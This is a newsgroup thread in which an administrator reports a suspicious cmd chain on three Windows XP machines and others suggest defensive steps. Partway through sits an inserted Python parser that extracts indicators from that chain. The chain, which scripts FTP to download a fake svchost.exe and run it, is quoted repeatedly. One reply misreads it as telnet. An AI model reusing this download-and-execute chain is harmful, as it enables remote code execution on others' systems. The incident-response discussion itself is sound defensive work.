Virus Activity?

ctowndu33

We had three users (all with XP SP2) that all of a sudden this morning had
their task manager open up along with a command prompt. In the command
prompt, a statement was input along the lines of the following....

cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password >> o
&echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o
&svchost.exe


Anyone seen anything like this before? We haven't approved any Windows
Updates or anything like that (even though I wouldn't think that would have
anything to do with this). That is not a typo (above in the statement where
it says mircosoft password). Any help would be appreciated. We saw three at
the exact same time and then haven't seen anymore (we have about 100 Windows
XP SP2 machines).

Thanks in advance,
ctowndu33
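As an added defender-side example (not code from anyone in this thread), the Python below reconstructs the ftp script that a chain like the one quoted above writes to disk, then reports the host, the credentials, the file fetched and the file run, which is what you would want pulled out when such a command line turns up in process-creation or EDR telemetry. The sample command line is a constructed copy of the one in the post; nothing in the block touches the network.

```python
import re
SAMPLE_CMDLINE = (  # constructed copy of the command line quoted in the post
    "cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password >> o "
    "&echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &svchost.exe"
)
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe"}  # lookalike names

def split_chain(cmdline):
    """Strip a leading 'cmd /k' or 'cmd /c' and split on '&' (cmd.exe sequencing)."""
    cmdline = re.sub(r"^\s*cmd(?:\.exe)?\s+/[kc]\s+", "", cmdline, flags=re.I)
    return [p.strip() for p in cmdline.split("&") if p.strip()]

def reconstruct_scripts(parts):
    """Rebuild the files written by 'echo text > file' / 'echo text >> file' parts."""
    scripts = {}
    for p in parts:
        m = re.match(r"echo\s+(.*?)\s*(>>?)\s*(\S+)$", p, re.I)
        if m:
            if m.group(2) == ">":  # '>' truncates the file, '>>' appends to it
                scripts[m.group(3)] = []
            scripts.setdefault(m.group(3), []).append(m.group(1))
    return scripts

def analyze(cmdline):
    """Report what a scripted-FTP download-and-execute chain would fetch and run."""
    parts = split_chain(cmdline)
    scripts = reconstruct_scripts(parts)
    r = {"script": None, "host": None, "port": None, "user": None,
         "downloads": [], "executes": [], "indicators": []}
    ftp_idx = None
    for i, p in enumerate(parts):
        m = re.match(r"ftp\b.*-s:(\S+)", p, re.I)  # ftp driven by a script file
        if m:
            ftp_idx, r["script"] = i, m.group(1)
    for line in scripts.get(r["script"], []):  # replay the reconstructed ftp script
        tok = line.split()
        if len(tok) > 1 and tok[0].lower() == "open":
            r["host"], r["port"] = tok[1], (int(tok[2]) if len(tok) > 2 else 21)
        elif len(tok) > 1 and tok[0].lower() == "user":
            r["user"] = tok[1]
        elif len(tok) > 1 and tok[0].lower() in ("get", "mget"):
            r["downloads"].append(tok[1])
    for p in parts[ftp_idx + 1:] if ftp_idx is not None else []:
        if p.split()[0].lower() in {d.lower() for d in r["downloads"]}:
            r["executes"].append(p.split()[0])  # downloaded file run in the same chain
        elif re.match(r"del\b.*\s" + re.escape(r["script"]) + r"$", p, re.I):
            r["indicators"].append("ftp script deleted after use")
    if SYSTEM_NAMES & {d.lower() for d in r["downloads"]}:
        r["indicators"].append("download named like a Windows system binary")
    return r
```

On the sample above, analyze() reports host ms.microsoft.com:21, user mircosoft, a download of svchost.exe that is then executed, plus the deleted script and the system-binary lookalike name as indicators.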
 
ctowndu33 <ctowndu33@discussions.microsoft.com> wrote:
> We had three users (all with XP SP2) that all of a sudden this
> morning had their task manager open up along with a command prompt.
> In the command prompt, a statement was input along the lines of the
> following....
>
> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password
> >> o &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F
> /Q o &svchost.exe
>
>
> Anyone seen anything like this before? We haven't approved any
> Windows Updates or anything like that (even though I wouldn't think
> that would have anything to do with this). That is not a typo (above
> in the statement where it says mircosoft password). Any help would
> be appreciated. We saw three at the exact same time and then haven't
> seen anymore (we have about 100 Windows XP SP2 machines).
>
> Thanks in advance,
> ctowndu33


What antivirus software do you use? What firewall protects your network? Is
the Windows firewall enabled on these machines? I would disconnect them from
the network immediately while you do some checking, although if your other
machines aren't sufficiently protected you may have other creepy crawlies on
the network.
 
Looks suspicious. There are viruses that infect svchost.exe. Not sure what to
make of the commands though. "open" is not a Windows application or command and
"ms.microsoft.com" is registered to Microsoft. Of course they could have that
go anywhere if your hosts file was hacked.

"ctowndu33" <ctowndu33@discussions.microsoft.com> wrote in message
news:600CC05B-F956-46D5-9249-4359BF2F8766@microsoft.com...
> We had three users (all with XP SP2) that all of a sudden this morning had
> their task manager open up along with a command prompt. In the command
> prompt, a statement was input along the lines of the following....
>
> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password >> o
> &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o
> &svchost.exe
>
>
> Anyone seen anything like this before? We haven't approved any Windows
> Updates or anything like that (even though I wouldn't think that would have
> anything to do with this). That is not a typo (above in the statement where
> it says mircosoft password). Any help would be appreciated. We saw three at
> the exact same time and then haven't seen anymore (we have about 100 Windows
> XP SP2 machines).
>
> Thanks in advance,
> ctowndu33
 
We for the most part are up to date on Windows Updates. We are also up to date
on our Symantec CE for the desktops (not my personal choice but everyone has
current definitions). We have a PIX in place, but our Windows Firewalls are
turned off. Since my post, I was told from one of our users that their
cursor moved. Now, the guy here before me deployed VNC through his image to
all the PCs. Since then, I have created a new image without VNC and in the
last 6 months, we have replaced about 1/2 of the computers. This was a great
excuse to go out and remove the rest of the installs. I can't imagine though
anyone that previously worked here connecting and trying to execute that
command.

"Lanwench [MVP - Exchange]" wrote:

> ctowndu33 <ctowndu33@discussions.microsoft.com> wrote:
> > We had three users (all with XP SP2) that all of a sudden this
> > morning had their task manager open up along with a command prompt.
> > In the command prompt, a statement was input along the lines of the
> > following....
> >
> > cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password
> > >> o &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F
> > /Q o &svchost.exe
> >
> >
> > Anyone seen anything like this before? We haven't approved any
> > Windows Updates or anything like that (even though I wouldn't think
> > that would have anything to do with this). That is not a typo (above
> > in the statement where it says mircosoft password). Any help would
> > be appreciated. We saw three at the exact same time and then haven't
> > seen anymore (we have about 100 Windows XP SP2 machines).
> >
> > Thanks in advance,
> > ctowndu33
>
> What antivirus software do you use? What firewall protects your network? Is
> the Windows firewall enabled on these machines? I would disconnect them from
> the network immediately while you do some checking, although if your other
> machines aren't sufficiently protected you may have other creepy crawlies on
> the network.
>
>
>
 
fdisk and format and reinstall



"ctowndu33" <ctowndu33@discussions.microsoft.com> wrote in message
news:600CC05B-F956-46D5-9249-4359BF2F8766@microsoft.com...
> We had three users (all with XP SP2) that all of a sudden this morning had
> their task manager open up along with a command prompt. In the command
> prompt, a statement was input along the lines of the following....
>
> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password >> o
> &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o
> &svchost.exe
>
>
> Anyone seen anything like this before? We haven't approved any Windows
> Updates or anything like that (even though I wouldn't think that would have
> anything to do with this). That is not a typo (above in the statement where
> it says mircosoft password). Any help would be appreciated. We saw three at
> the exact same time and then haven't seen anymore (we have about 100 Windows
> XP SP2 machines).
>
> Thanks in advance,
> ctowndu33
 
ctowndu33 <ctowndu33@discussions.microsoft.com> wrote:
> We for the most part are up to date on Windows Updates. We are also
> up to date on our Symantec CE for the desktops (not my personal choice
> but everyone has current definitions).


Have you forced a full scan?
What about anti-malware/adware/spyware?

> We have a PIX in place, but
> our Windows Firewalls are turned off.


I'd change that (use group policy to manage it, as I expect you have AD).
You can set up exceptions as needed. Also, on your PIX, I'd deny all
outbound Internet access from the LAN IP range used by your workstations
except TCP 80 and 443, for starters - and remove your end users from the
local administrators groups.

> Since my post, I was told from
> one of our users that their cursor moved. Now, the guy here before
> me deployed VNC through his image to all the PCs. Since then, I have
> created a new image without VNC and in the last 6 months, we have
> replaced about 1/2 of the computers. This was a great excuse to go
> out and remove the rest of the installs. I can't imagine though
> anyone that previously worked here connecting and trying to execute
> that command.


Is VNC traffic even allowed inbound through your PIX? Close it, if so. What
exactly is open?

What you saw looks highly suspicious to me. Someone or something is trying
to run a telnet session for some reason. I can't find anything useful in
google, but you might post in microsoft.public.security for more expert
help.





>
> "Lanwench [MVP - Exchange]" wrote:
>
>> ctowndu33 <ctowndu33@discussions.microsoft.com> wrote:
>>> We had three users (all with XP SP2) that all of a sudden this
>>> morning had their task manager open up along with a command prompt.
>>> In the command prompt, a statement was input along the lines of the
>>> following....
>>>
>>> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password
>>> >> o &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F
>>> /Q o &svchost.exe
>>>
>>>
>>> Anyone seen anything like this before? We haven't approved any
>>> Windows Updates or anything like that (even though I wouldn't think
>>> that would have anything to do with this). That is not a typo
>>> (above in the statement where it says mircosoft password). Any
>>> help would be appreciated. We saw three at the exact same time and
>>> then haven't seen anymore (we have about 100 Windows XP SP2
>>> machines).
>>>
>>> Thanks in advance,
>>> ctowndu33
>>
>> What antivirus software do you use? What firewall protects your
>> network? Is the Windows firewall enabled on these machines? I would
>> disconnect them from the network immediately while you do some
>> checking, although if your other machines aren't sufficiently
>> protected you may have other creepy crawlies on the network.
 
Lenny <here@there.com> wrote:
> fdisk and format and reinstall


That's pretty extreme!


>
>
>
> "ctowndu33" <ctowndu33@discussions.microsoft.com> wrote in message
> news:600CC05B-F956-46D5-9249-4359BF2F8766@microsoft.com...
>> We had three users (all with XP SP2) that all of a sudden this
>> morning had their task manager open up along with a command prompt.
>> In the command prompt, a statement was input along the lines of the
>> following....
>>
>> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft
>> password >> o &echo get svchost.exe >> o &echo quit >> o &ftp -n
>> -s:o &del /F /Q o &svchost.exe
>>
>>
>> Anyone seen anything like this before? We haven't approved any
>> Windows Updates or anything like that (even though I wouldn't think
>> that would have anything to do with this). That is not a typo
>> (above in the statement where it says mircosoft password). Any help
>> would be appreciated. We saw three at the exact same time and then
>> haven't seen anymore (we have about 100 Windows XP SP2 machines).
>>
>> Thanks in advance,
>> ctowndu33
 